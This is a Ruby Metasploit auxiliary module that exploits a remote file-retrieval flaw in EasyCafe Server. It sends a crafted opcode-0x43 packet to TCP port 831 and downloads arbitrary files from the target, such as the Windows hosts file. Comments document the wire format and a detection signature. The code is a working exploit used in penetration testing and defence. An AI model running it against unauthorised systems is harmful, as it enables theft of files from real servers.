GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
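class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Wire format handled by this module (as implemented in run_host / get_file):
  #   request  -> 831/TCP: 1-byte opcode 0x43, a 255-byte NUL-padded path field,
  #               then "\x01\x00\x00\x00\x01" -- always 261 bytes on the wire
  #   response <- 261-byte header whose little-endian uint32 at offset 256 is the
  #               file size, followed by the raw file contents
  # For detection: an inbound 261-byte request to 831/TCP whose first byte is
  # 0x43 followed by a NUL-padded file path is the signature of this access.

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'EasyCafe Server Remote File Access',
      'Description' => %q{
        This module exploits a file retrieval vulnerability in
        EasyCafe Server. The vulnerability can be triggered by
        sending a specially crafted packet (opcode 0x43) to the
        831/TCP port.
        This module has been successfully tested on EasyCafe Server
        version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3
        and Windows 7 SP1.
        Note that the server will throw a popup messagebox if the
        specified file does not exist.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'R-73eN', # Vulnerability Discovery
          'bcoles' # Metasploit module
        ],
      'References' =>
        [
          [ 'EDB', '39102' ]
        ]
    ))

    register_options(
      [
        Opt::RPORT(831),
        OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts'])
      ])
  end

  # Reads the 261-byte response header from +sock+ and then the announced
  # number of body bytes.
  #
  # @return [String, nil] the file contents, or nil (after print_error) when the
  #   header never arrives, has an unexpected size, or the body read is cut
  #   short by a timeout
  def get_file
    res = sock.get_once
    unless res
      print_error("Unable to retrieve file due to a timeout.")
      return
    end

    # Compare bytes rather than characters: the header is a fixed 261-byte blob.
    unless res.bytesize == 261
      print_error("Received a response of an invalid size.")
      return
    end

    # Little-endian uint32 at offset 256 of the header announces the body length.
    # NOTE(review): this value is supplied by the remote peer and is not bounded
    # here, so a hostile or buggy server can make the client buffer grow to
    # whatever it claims -- a cap would be a reasonable hardening step.
    file_size = res.unpack('@256V')[0]
    contents = String.new
    while contents.bytesize < file_size
      chunk = sock.get_once
      # get_once returns nil on timeout; appending nil would raise TypeError,
      # so report the short read and bail out like the other error paths.
      unless chunk
        print_error("Unable to retrieve file due to a timeout (#{contents.bytesize} of #{file_size} bytes received).")
        return
      end
      contents << chunk
    end

    print_good("File retrieved successfully (#{contents.bytesize} bytes)!")
    contents
  end

  # Builds the 261-byte request for datastore['FILEPATH'], sends it to +ip+ on
  # RPORT, and stores whatever comes back via store_loot.
  #
  # @param ip [String] host being scanned; used to label the stored loot
  # @return [nil]
  def run_host(ip)
    file_path = datastore['FILEPATH']
    # The limit is enforced on bytes because the path is copied verbatim into a
    # fixed 255-byte field; a multibyte path must not produce a mis-sized packet.
    if file_path.bytesize > 67
      print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.")
      return
    end

    # opcode, NUL-padded path field (255 bytes), fixed 5-byte trailer
    packet = "\x43".b
    packet << file_path.b
    packet << "\x00" * (255 - file_path.bytesize)
    packet << "\x01\x00\x00\x00\x01"

    vprint_status("Sending request (#{packet.bytesize} bytes)")
    connect
    begin
      sock.put(packet)
      contents = get_file
    ensure
      # Release the socket even if the read raises; the original skipped
      # disconnect on any exception between connect and disconnect.
      disconnect
    end
    return if contents.nil?

    path = store_loot(
      'easycafe_server',
      'application/octet-stream',
      ip,
      contents,
      File.basename(file_path)
    )
    print_status("File saved in: #{path}")
  end
end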